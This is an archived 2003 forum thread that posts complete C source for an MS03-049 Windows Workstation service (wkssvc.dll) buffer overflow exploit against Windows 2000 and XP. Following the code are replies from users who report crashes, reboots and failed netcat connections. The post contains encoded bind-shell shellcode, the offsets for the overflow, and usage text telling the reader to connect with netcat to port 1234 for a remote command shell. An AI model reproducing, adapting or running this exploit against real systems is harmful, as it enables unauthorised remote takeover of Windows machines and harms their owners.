Windows Workstation Service Overflow For W2k&winxp

Full Version: Windows Workstation Service Overflow For W2k&winxp

GovernmentSecurity.org > The Archives > Public Downloads

Anarchy

Nov 16 2003, 01:55 AM

its easy to recompile:)

CODE

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>

typedef
//NET_API_STATUS NET_API_FUNCTION
(*MYPROC)(
IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);

#define SIZE 8192

#pragma comment(lib,"mpr.lib")

#pragma comment(lib,"Ws2_32.lib")

unsigned char shellcode[] =

"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\xe4\x01\x80\x34\x0A\x1b\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x98\xF7\x2F\x90\xEF\xF3\x5C\x1A\x1B\x1B\x92\x1D\xE4\x2D\x73\x95"
"\x55\x15\xF7\xF3\x7A\x1A\x1B\x1B\x92\x5D\x13\xE4\x2D\x73\xB6\xC2"
"\x1E\xD5\xF3\x49\x1A\x1B\x1B\x92\x5D\x17\x73\x77\x77\x1B\x1B\x73"
"\x28\x29\x35\x7F\x73\x6C\x68\x29\x44\x4F\xE4\x4D\x13\x92\x5D\x1F"
"\xE4\x2D\x73\x69\xE5\xA8\x0D\xF3\x36\x1A\x1B\x1B\x92\x5D\x0B\xE4"
"\x2D\x73\xF4\xD5\xFB\x7B\xF3\x05\x1A\x1B\x1B\x92\x5D\x0F\xE4\x6D"
"\x1F\x73\xD0\xF6\xE7\x20\xF3\x15\x1A\x1B\x1B\x92\x5D\x03\xE4\x6D"
"\x1F\x73\xC2\x12\xEE\xB6\xF3\xE5\x1B\x1B\x1B\x92\x5D\x07\xE4\x6D"
"\x1F\x73\xBF\x01\x6B\xDC\xF3\xF5\x1B\x1B\x1B\x92\x5D\x3B\xE4\x6D"
"\x1F\x73\xBF\xB6\x35\xF2\xF3\xC5\x1B\x1B\x1B\x92\x5D\x3F\xE4\x6D"
"\x1F\x73\xFE\x52\x9D\x52\xF3\xD5\x1B\x1B\x1B\x92\x5D\x33\xE4\x6D"
"\x1F\x73\xFC\x62\xDD\x62\xF3\xA5\x1B\x1B\x1B\x92\x5D\x37\x28\xE4"
"\x9A\xF7\x8B\x1A\x1B\x1B\x4F\x73\x1A\x1A\x1B\x1B\xE4\x4D\x03\x4B"
"\x4B\x4B\x4B\x5B\x4B\x5B\x4B\xE4\x4D\x07\x90\xC3\x4C\x4C\x73\x19"
"\x1B\x1F\xC9\x90\xD7\x71\x0D\x4A\x48\xE4\x4D\x3B\x4C\x48\xE4\x4D"
"\x3F\x4C\x4A\x48\xE4\x4D\x33\x90\xCB\x73\x7E\x63\x7E\x1B\x73\x78"
"\x76\x7F\x35\x92\x7D\x2B\x98\xF7\x4F\x96\x27\x3F\x28\xDB\x28\xD2"
"\x98\xDA\x0E\xB0\xF9\xE6\xDD\x5F\x3F\x0B\x5F\xE5\x5F\x3F\x26\x92"
"\x4F\x3F\x53\x92\x4F\x3F\x57\x92\x4F\x3F\x4B\x96\x5F\x3F\x0B\x4F"
"\x4B\x4A\x4A\x4A\x71\x1A\x4A\x4A\xE4\x6D\x2B\x4A\xE4\x4D\x0B\x90"
"\xD7\x71\xE4\xE4\x2A\xE4\x4D\x17\x90\xD3\x4C\xE4\x4D\x37\xE4\x4D"
"\x0F\x4E\x4D\x7F\xBA\x2B\x1B\x1B\x1B\x9E\xDB\x63\x17\x90\x5B\x17"
"\x90\x6B\x07\xB6\x90\x73\x13\xF0\x12\x90\x5B\x2F\x90\xB3\xA3\x1B"
"\x1B\x1B\x90\xDE\x45\x46\xD9\x1F\x1B\x48\x4E\x4D\x4C\x90\x77\x3F"
"\x03\x90\x5E\x27\x90\x4F\x1E\x63\x18\xCE\x90\x51\x03\x90\x41\x3B"
"\x18\xC6\xF8\x29\x52\x90\x2F\x90\x18\xEE\x28\xE4\xE7\x28\xDB\xB7"
"\x21\xDF\x6F\x1C\xDA\xD4\x16\x18\xE3\xF0\xE9\x20\x67\x3F\x0F\x6E"
"\xFA\x90\x41\x3F\x18\xC6\x7D\x90\x17\x50\x90\x41\x07\x18\xC6\x90"
"\x1F\x90\x18\xDE\xF0\x19\x28\xDB\x90\xCE\x44\x45\x46\x40\xD9\x1F"
"\x1B\x8B\x8B\x8B\x9B\xA4\x29\x8F\xF8\xC9\x4D\xAF\x1B";

int main(int argc,char ** argv)
{
int ret=0;
HINSTANCE hInstance;
MYPROC procAddress=NULL;
unsigned char szBuffer[SIZE];
NETRESOURCE netResource;
int i=0,j;
unsigned char temp;

char host[30];
LPSTR hostipc[40];
LPWSTR hostl[60];
if(argc<2) {
printf("Windows Workstation ms03-049 wkssvc.dll buffer overflow \n \
bug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n \
Modified by sbaa(sbaa@163.net) 2003/11/16 ver 0.2\n \
Usage: \n \
On 2k : \n \
%s IP --> attack 2k without ntfs\n \
On xp : \n \
%s IP 2k --> attack 2k without ntfs\n \
%s IP --> attack xp \n \
Next open another window : nc Ip 1234 --> Get cmd shell @.@\n",argv[0],argv[0],argv[0]);
printf("");
return 0;
}
sprintf(host,"\\\\%s",argv[1]);
sprintf((char *)hostipc,"%s\\ipc$",host);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;

ret = WNetAddConnection2(&netResource, "", "", 0);
if (ret != 0)
{
fprintf(stderr, "Can't create null session ! \n");
// return 1;
}

hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "LoadLibrary failed\n");
return 1;
}

if (((argc>2) &&(strcmp(argv[2],"2k")!=0))||(argc==2))
procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName");

memset(szBuffer, 0x41, SIZE);
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetAddAlternateComputerName (Now try to attack 2k!) \n");
// return 1;
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName");

if (procAddress == NULL)
{
fprintf(stderr, "can't find NetValidateName!\n");
return 1;
}

memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);

memcpy(szBuffer+1851,"\x1b\x4a\xfa\x7f",4);
memcpy(szBuffer+2017,"\x1b\x4a\xfa\x7f",4);
szBuffer[2048]=0;
}

else
{

for(j=0;j<SIZE/2;j++){

szBuffer[j*2]=0x41;
szBuffer[j*2+1]=0;
}

memcpy(szBuffer+2044*2,"\x12\x00\x45\x00\xfa\x00\x7f\x00",8);

for(j=0;j<sizeof(shellcode);j++){
temp=shellcode[j];

szBuffer[2064*2+j*2]=shellcode[j];
szBuffer[2064*2+j*2+1]=0;
}

szBuffer[SIZE-1]=0;
}

memset(hostl,0,sizeof(hostl));
MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);

try{
ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);

}

catch(...)
{

}

printf("%d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hInstance);
return 0;
}

jsands

Nov 16 2003, 02:28 AM

yeah, just wondering exactly what this exploit is supposed to do, i tested it on my home pc, it says 1745 and that's it. Is it supposed to launch a shell? Am I supposed to connect through netcat on 1745? Thanks for your time.

tribalgoa

Nov 16 2003, 03:06 AM

i'm having about the same ... getting '50' when i run it locally

wicked

Nov 16 2003, 03:42 AM

This seems to be the Problem .... there ain't no Instructions with the code...

Good Programming Practice usually Contains Basic Instructions on how to use the Product Else who would even know what this does... if the Name Wasn't present??

Sorry mate , not trying to take the Micky out of anybody .. but I have come accross heaps of this kinda code.. Hell even posted some myself... with no instructions.....Perhaps we could compile the source and test it and write a few lines of Code Describing at the the Basic Features on how to use the Program..

Wkd.

.../

Toilal

Nov 16 2003, 04:00 AM

Anyone got a box ? What return code should we have if buffer overflow success ?

DJVASTVASTY2K

Nov 16 2003, 06:01 AM

printf("Windows Workstation ms03-049 wkssvc.dll buffer overflow \n \
bug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n \
Modified by sbaa(sbaa@163.net) 2003/11/16 ver 0.2\n \

Was Discovered By A Big IT Org

eEye Security

they are the ones who made the tool "Retina"

Best Regards

Adam

Vast Gsm Team

Da Sick Crew

nitrofuran

Nov 16 2003, 09:57 AM

QUOTE

Next open another window : nc Ip 1234 --> Get cmd shell @.@\n",argv[0],argv[0],argv[0]);

isn't this information enough?

gordan wells

Nov 16 2003, 10:56 AM

didnt work for me
I tried it on local pc, try to connect with netcat, nothing: connection refused

flohand

Nov 16 2003, 12:07 PM

I test It , on a W2kSp1 , it reeboot the machine (like Mblast), but no shell

( Sry for my poor English

)

derquakecommander

Nov 16 2003, 12:32 PM

i have tested it on local Windows XP no SP and it crash my pc so that i have to push the reset button but i can't test if there is a shell or something else

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.